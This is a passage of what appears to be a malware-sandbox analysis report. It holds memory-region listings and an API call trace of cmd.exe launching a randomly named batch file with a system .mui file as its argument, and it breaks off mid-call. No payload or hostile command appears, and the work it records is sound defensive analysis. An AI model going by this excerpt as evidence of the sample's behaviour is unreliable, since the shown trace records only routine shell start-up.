0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 8055 start_va = 0xde0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 8056 start_va = 0xee0000 end_va = 0xfdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 8057 start_va = 0x7f2b8000 end_va = 0x7f2bafff entry_point = 0x0 region_type = private name = "private_0x000000007f2b8000" filename = "" Region: id = 8058 start_va = 0x890000 end_va = 0x893fff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 8107 start_va = 0x8a0000 end_va = 0x8a3fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 8118 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 8119 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8120 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8121 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8122 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8123 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8124 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8125 start_va = 0xb40000 end_va = 0xb4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b40000" filename = "" Region: id = 8189 start_va = 0xfe0000 end_va = 0x1316fff entry_point = 0xfe0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 907 os_tid = 0x324 [0280.673] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0280.673] __set_app_type (_Type=0x1) [0280.673] __p__fmode () returned 0x77984d6c [0280.673] __p__commode () returned 0x77985b1c [0280.673] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0280.673] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0280.673] GetCurrentThreadId () returned 0x324 [0280.673] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x324) returned 0x84 [0280.674] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0280.674] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0280.674] SetThreadUILanguage (LangId=0x0) returned 0x409 [0280.679] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0280.679] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa0ff04 | out: phkResult=0xa0ff04*=0x0) returned 0x2 [0280.679] VirtualQuery (in: lpAddress=0xa0ff0b, lpBuffer=0xa0febc, dwLength=0x1c | out: lpBuffer=0xa0febc*(BaseAddress=0xa0f000, AllocationBase=0x910000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0280.679] VirtualQuery (in: lpAddress=0x910000, lpBuffer=0xa0febc, dwLength=0x1c | out: lpBuffer=0xa0febc*(BaseAddress=0x910000, AllocationBase=0x910000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0280.679] VirtualQuery (in: lpAddress=0x911000, lpBuffer=0xa0febc, dwLength=0x1c | out: lpBuffer=0xa0febc*(BaseAddress=0x911000, AllocationBase=0x910000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0280.679] VirtualQuery (in: lpAddress=0x913000, lpBuffer=0xa0febc, dwLength=0x1c | out: lpBuffer=0xa0febc*(BaseAddress=0x913000, AllocationBase=0x910000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0280.679] VirtualQuery (in: lpAddress=0xa10000, lpBuffer=0xa0febc, dwLength=0x1c | out: lpBuffer=0xa0febc*(BaseAddress=0xa10000, AllocationBase=0xa10000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0280.679] GetConsoleOutputCP () returned 0x1b5 [0280.685] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0280.686] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0280.686] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.686] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0280.687] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.687] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0280.693] _get_osfhandle (_FileHandle=1) returned 0x3c [0280.693] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0280.694] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.694] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0280.707] _get_osfhandle (_FileHandle=0) returned 0x38 [0280.707] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0280.749] GetEnvironmentStringsW () returned 0xde7ea8* [0280.749] FreeEnvironmentStringsA (penv="A") returned 1 [0280.749] GetEnvironmentStringsW () returned 0xde7ea8* [0280.749] FreeEnvironmentStringsA (penv="A") returned 1 [0280.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa0ee68 | out: phkResult=0xa0ee68*=0x94) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x0, lpData=0xa0ee74*=0x56, lpcbData=0xa0ee70*=0x1000) returned 0x2 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x1, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x0, lpData=0xa0ee74*=0x1, lpcbData=0xa0ee70*=0x1000) returned 0x2 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x0, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x40, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x40, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x0, lpData=0xa0ee74*=0x40, lpcbData=0xa0ee70*=0x1000) returned 0x2 [0280.749] RegCloseKey (hKey=0x94) returned 0x0 [0280.749] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa0ee68 | out: phkResult=0xa0ee68*=0x94) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x0, lpData=0xa0ee74*=0x40, lpcbData=0xa0ee70*=0x1000) returned 0x2 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x1, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x0, lpData=0xa0ee74*=0x1, lpcbData=0xa0ee70*=0x1000) returned 0x2 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x0, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.749] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x9, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.750] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x4, lpData=0xa0ee74*=0x9, lpcbData=0xa0ee70*=0x4) returned 0x0 [0280.750] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa0ee6c, lpData=0xa0ee74, lpcbData=0xa0ee70*=0x1000 | out: lpType=0xa0ee6c*=0x0, lpData=0xa0ee74*=0x9, lpcbData=0xa0ee70*=0x1000) returned 0x2 [0280.750] RegCloseKey (hKey=0x94) returned 0x0 [0280.750] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432a1 [0280.750] srand (_Seed=0x5bb432a1) [0280.750] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"\"" [0280.750] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\"\"" [0280.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.750] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xde7eb0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0280.750] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0280.750] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.750] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0280.750] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0280.750] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0280.750] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0280.750] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0280.750] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0280.750] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0280.750] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0280.750] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0280.751] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0280.751] GetEnvironmentStringsW () returned 0xde80c0* [0280.751] FreeEnvironmentStringsA (penv="A") returned 1 [0280.751] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.751] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0280.751] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0280.751] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0280.751] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0280.751] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0280.751] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0280.751] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0280.751] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0280.751] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0280.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa0fc40 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.751] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xa0fc40, lpFilePart=0xa0fc38 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa0fc38*="Desktop") returned 0x1d [0280.751] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0280.752] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa0f9c0 | out: lpFindFileData=0xa0f9c0) returned 0xde05c8 [0280.752] FindClose (in: hFindFile=0xde05c8 | out: hFindFile=0xde05c8) returned 1 [0280.752] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xa0f9c0 | out: lpFindFileData=0xa0f9c0) returned 0xde05c8 [0280.752] FindClose (in: hFindFile=0xde05c8 | out: hFindFile=0xde05c8) returned 1 [0280.752] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0280.752] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xa0f9c0 | out: lpFindFileData=0xa0f9c0) returned 0xde05c8 [0280.752] FindClose (in: hFindFile=0xde05c8 | out: hFindFile=0xde05c8) returned 1 [0280.752] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0280.752] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0280.752] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0280.752] GetEnvironmentStringsW () returned 0xde80c0* [0280.752] FreeEnvironmentStringsA (penv="=") returned 1 [0280.752] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0280.753] GetConsoleOutputCP () returned 0x1b5 [0280.782] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0280.782] GetUserDefaultLCID () returned 0x409 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa0fd70, cchData=128 | out: lpLCData="0") returned 2 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa0fd70, cchData=128 | out: lpLCData="0") returned 2 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa0fd70, cchData=128 | out: lpLCData="1") returned 2 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0280.782] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0280.782] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0280.783] GetConsoleTitleW (in: lpConsoleTitle=0xdea9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.831] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0280.832] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0280.832] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0280.832] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0280.833] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0280.833] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0280.833] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0280.833] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0280.833] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0280.833] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0280.833] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0280.834] GetConsoleTitleW (in: lpConsoleTitle=0xa0fa58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0280.835] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0280.835] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0280.836] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0280.836] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0280.836] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0280.836] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0280.836] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0280.836] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0280.836] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0280.836] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0280.836] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0280.836] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0280.836] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0280.836] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0280.836] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0280.836] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0280.836] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0280.836] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0280.836] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0280.836] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0280.836] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0280.836] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0280.836] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0280.836] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0280.836] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0280.836] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0280.836] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0280.836] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0280.836] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0280.836] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0280.836] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0280.836] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0280.836] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0280.836] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0280.836] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0280.836] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0280.836] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0280.836] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0280.836] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0280.836] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0280.836] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0280.836] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0280.836] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0280.836] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0280.836] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0280.836] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0280.836] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0280.837] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0280.837] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0280.837] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0280.837] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0280.837] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0280.837] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0280.837] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0280.837] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0280.837] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0280.837] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0280.837] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0280.837] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0280.837] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0280.837] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0280.837] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0280.837] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0280.837] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0280.837] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0280.837] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0280.837] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0280.837] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0280.837] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0280.837] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0280.837] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0280.837] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0280.837] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0280.837] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0280.837] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0280.837] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0280.837] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0280.837] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0280.837] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0280.837] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0280.837] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0280.837] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0280.837] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0280.837] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0280.837] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0280.837] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0280.837] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0280.837] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0280.838] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0280.838] SetErrorMode (uMode=0x0) returned 0x0 [0280.838] SetErrorMode (uMode=0x1) returned 0x0 [0280.838] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xde05d0, lpFilePart=0xa0f564 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa0f564*="Desktop") returned 0x1d [0280.838] SetErrorMode (uMode=0x0) returned 0x1 [0280.838] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0280.838] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0280.841] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0280.841] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0xa0f310, 